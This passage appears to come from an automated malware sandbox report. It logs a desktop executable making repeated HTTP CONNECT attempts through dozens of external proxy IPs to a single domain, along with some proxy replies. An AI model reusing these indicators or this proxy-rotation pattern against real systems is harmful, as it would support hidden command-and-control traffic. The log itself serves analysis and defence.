                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      259192.168.2.449795177.87.250.669996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.001863003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.870153904 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      260192.168.2.449829189.240.60.17190906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.001909018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.191194057 CET72INHTTP/1.1 200 Connection established
                                                                                                      Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      261192.168.2.450563185.215.160.118350106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.003391027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      262192.168.2.450584162.240.10.35350876812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.041424990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178188086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      263192.168.2.449881192.99.37.19596036812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.043878078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098678112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.147054911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.200650930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.266370058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.271764040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:07.271859884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      264192.168.2.449893166.62.53.45568626812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.047399998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098715067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      265192.168.2.449889109.123.254.43510256812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.047736883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178188086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      266192.168.2.44993172.167.221.145536726812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.053325891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178256035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      267192.168.2.44996051.210.4.123562386812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.065144062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178256035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178472042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.178821087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.178174973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      268192.168.2.450057107.181.168.14541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.090095997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      269192.168.2.450562142.54.236.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.118555069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      270192.168.2.450033193.41.88.58532816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.120173931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.907593012 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      271192.168.2.45004877.235.19.280806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.156640053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.211344957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.257405996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.334609985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      272192.168.2.45020612.186.205.123806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.178517103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.304444075 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      273192.168.2.450204192.99.37.195364776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.182307005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.366012096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.365928888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.366255999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.381254911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      274192.168.2.45059072.210.252.13741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.184578896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      275192.168.2.45059324.249.199.441456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.194844007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      276192.168.2.450092207.180.234.220369466812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.195357084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.211396933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.257324934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.334609985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.443852901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.443623066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:07.443665028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      277192.168.2.45011994.23.83.53643056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.204169035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.366040945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.365958929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.366249084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.381273031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.381158113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:07.381194115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      278192.168.2.449974152.67.10.19081006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.220941067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      279192.168.2.45060072.210.208.10141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.225501060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      280192.168.2.450591211.222.252.187806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.227819920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      281192.168.2.450594122.116.150.290006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.235693932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      282192.168.2.450332107.180.101.226598106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.255522966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.334374905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.370277882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.443952084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      283192.168.2.450598116.199.170.1741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.258266926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      284192.168.2.450597167.172.86.46104716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.275816917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      285192.168.2.45060598.170.57.23141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.279150009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      286192.168.2.45059961.7.183.15241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.285243988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      287192.168.2.450616172.67.3.98806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.285296917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.372627020 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      288192.168.2.450607174.77.111.19641456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.290007114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      289192.168.2.45060898.178.72.21109196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.295988083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      290192.168.2.45061224.249.199.1241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.321500063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      291192.168.2.450613184.178.172.13153116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.335763931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      292192.168.2.450611199.102.105.24241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.335931063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      293192.168.2.450627104.19.120.84806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.366497040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.454235077 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:19 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
